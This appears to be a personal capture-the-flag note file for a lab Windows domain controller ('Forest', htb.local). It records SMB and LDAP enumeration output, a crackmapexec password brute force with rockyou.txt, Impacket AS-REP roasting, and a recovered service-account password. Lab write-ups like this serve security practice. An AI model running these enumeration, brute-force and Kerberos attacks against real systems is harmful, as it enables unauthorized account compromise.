 `nc -vv 10.10.10.161 389`

- ldap is an open port


- https://github.com/SecureAuthCorp/impacket


- http://10.10.10.161:593/
	The response is ncacn_http/1.0i

## smbenum to enumerate users and oher opssible servies running
### Notable usernames

`nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users 10.10.10.159

```
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[newuser] rid:[0x1db1]
user:[archus] rid:[0x1db2]
user:[D1O] rid:[0x1db3]
user:[james] rid:[0x1db4]
```

## Domain admin
 - HTB\Administrator
 - htb.local

### Anon login via smbclient.py

### Possible bad config?
```
DefaultAccount (503)/FullName:
DefaultAccount (503)/UserComment:
DefaultAccount (503)/PrimaryGroupId: 513
DefaultAccount (503)/BadPasswordCount: 0
DefaultAccount (503)/LogonCount: 0
DefaultAccount (503)/PasswordLastSet: <never>
DefaultAccount (503)/PasswordDoesNotExpire: True
DefaultAccount (503)/AccountIsDisabled: True
DefaultAccount (503)/ScriptPath:

```

### ldapsearch results

- dnsHostName: FOREST.htb.local
- ldapServiceName: htb.local:forest$@HTB.LOCAL
- serverName: CN=FOREST,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=htb,DC=local

```
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=htb,DC=local
dsServiceName: CN=NTDS Settings,CN=FOREST,CN=Servers,CN=Default-First-Site-Nam
 e,CN=Sites,CN=Configuration,DC=htb,DC=local
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local
defaultNamingContext: DC=htb,DC=local
schemaNamingContext: CN=Schema,CN=Configuration,DC=htb,DC=local
configurationNamingContext: CN=Configuration,DC=htb,DC=local
rootDomainNamingContext: DC=htb,DC=local

```
### crackmapexec brute forcing

`crackmapexec smb 10.10.10.1
61 -d htb.local -u svc-alfresco -p /usr/share/wordlists/rockyou.txt `

### Impacket - GetNPUsers.py

```
./GetNPUsers.py htb.local/FOREST -usersfile ../../notes/smb-enum-usernames 
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
```

- It runs without a hitch but still need a password
- Local share `htb.local/forest
- Got his password: `s3rvice`

### getTGT.py 
```
ticken is a cache file in the impacket/examples/ dir
```

# In the end... to get user.. Just be evil
 - Impacket was having issues with kerberos and the time being off from that of the servers..
 - now that we can login as the user maybe check the time and try to configure kali's time to be in the same time zone








`
